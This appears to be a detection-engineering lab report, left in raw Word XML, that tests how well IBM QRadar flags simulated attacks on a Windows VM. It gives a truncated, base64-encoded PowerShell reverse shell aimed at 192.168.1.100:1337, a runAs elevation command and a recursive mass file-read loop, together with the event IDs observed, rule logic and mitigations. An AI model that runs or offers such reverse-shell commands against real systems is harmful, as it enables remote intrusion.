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QRadar Monitoring and Alerting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Lab Purpose: Detection and analysis of simulated malicious behavior on Windows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Log Source: Windows 10 VM (192.168.1.6)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SIEM: IBM QRadar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lab simulated three malicious behaviors on a Windows system. The goal was to validate QRadar’s ability to log and detect:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Obfuscated reverse shell execution</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Unauthorized privilege escalation attempts</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Mass file access resembling ransomware behavior</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Logs were forwarded to QRadar using Sysmon and Winlogbeat.</w:t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1. Simulated Reverse Shell Execution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Payload Summary (PowerShell):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$cmd = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',1337);..."'</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cmd))</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">powershell.exe -EncodedCommand $encoded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486400" cy="3124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21099813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Logs Observed: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Event ID 4104: PowerShell script block logging</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Sysmon Event ID 1: Process creation (powershell.exe with -EncodedCommand)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Sysmon Event ID 3: Possible outbound TCP connection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478780" cy="579120"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21099813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7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Alert Recommendation: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Mitigation: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Enable PowerShell logging (Module + ScriptBlock)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Block outbound traffic on uncommon ports (e.g., 1337)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Use AppLocker or WDAC to block encoded commands</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Alert on suspicious PowerShell command line arguments</w:t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  <w:t xml:space="preserve">2. Privilege Escalation Attempt</w:t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Simulation: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Start-Process powershell -Verb runAs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478780" cy="3108960"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21099813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0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Logs Observed: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Windows Event ID 4672: Special privileges assigned</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Event ID 4688: New process created with elevated token</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Sysmon ID 1 (optional): Process tree showing elevation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78780" cy="1402080"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21099813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0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Alert Recommendation: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Rule Name: Suspicious Privilege Escalation Attempt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">QRadar Rule Logic:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Process creation with 'IntegrityLevel = High' AND 'ParentProcess' is user-initiated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Event ID 4672 followed by 4688 within a short time</w:t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Mitigation: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Require password on UAC prompts</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Monitor for suspicious use of runAs or elevation requests</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Enable audit logon and privilege use events</w:t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3. Mass File Access (Recon or Ransomware Behavior)</w:t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Simulation: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Get-ChildItem -Recurse C:\Windows\System32 | ForEach-Object { Get-Content $_.FullName -ErrorAction SilentlyContinue }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs Observed: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 Sysmon Event ID 11: File access logs for many files</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- High event volume in a short time</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Possibly flagged as abnormal by behavioral rules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486400" cy="891540"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21099813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Alert Recommendation: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Rule Name: Unusual File Access Volume</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">QRadar Rule Logic:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- &gt;50 Sysmon ID 11 events from the same process/user in 1 minute</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Directory = C:\Windows, C:\Users, or C:\Program Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation: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Monitor for burst file reads</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Enable file integrity monitoring (FIM)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Block or alert on unknown PowerShell scripts accessing sensitive directories</w:t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QRadar Configuration Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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Sysmon Logging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Installed and Configured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Winlogbeat Forwarding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Logs forwarded via UDP 514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PowerShell Logging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Enabled via Group Policy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QRadar Log Source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Windows Host recognized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Custom Rules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Created manually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Offense Triggered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Triggered in Simulation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Screenshots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Captured for all behaviors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attachments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 Screenshot 1: Encoded PowerShell reverse shell (Event ID 4104 / Sysmon ID 1)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Screenshot 2: Privilege escalation logs (Event IDs 4672 and 4688)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Screenshot 3: File access storm (Sysmon ID 11)</w:t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QRadar successfully ingested logs and displayed activity related to simulated attacks. With appropriate rules in place, offenses can be triggered for:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Obfuscated PowerShell</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- Elevated token usage</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">- High file access rate (ransomware-like behavior)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The simulation confirms visibility and provides a strong foundation for building behavior-based detections.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5Ip1JUZ2LoUPh1GK9nSWejvP6A==">CgMxLjA4AHIhMUhWVmxHelNrNjNJVjl5NVEzVzA3QzNKVC1tWngwV2lZ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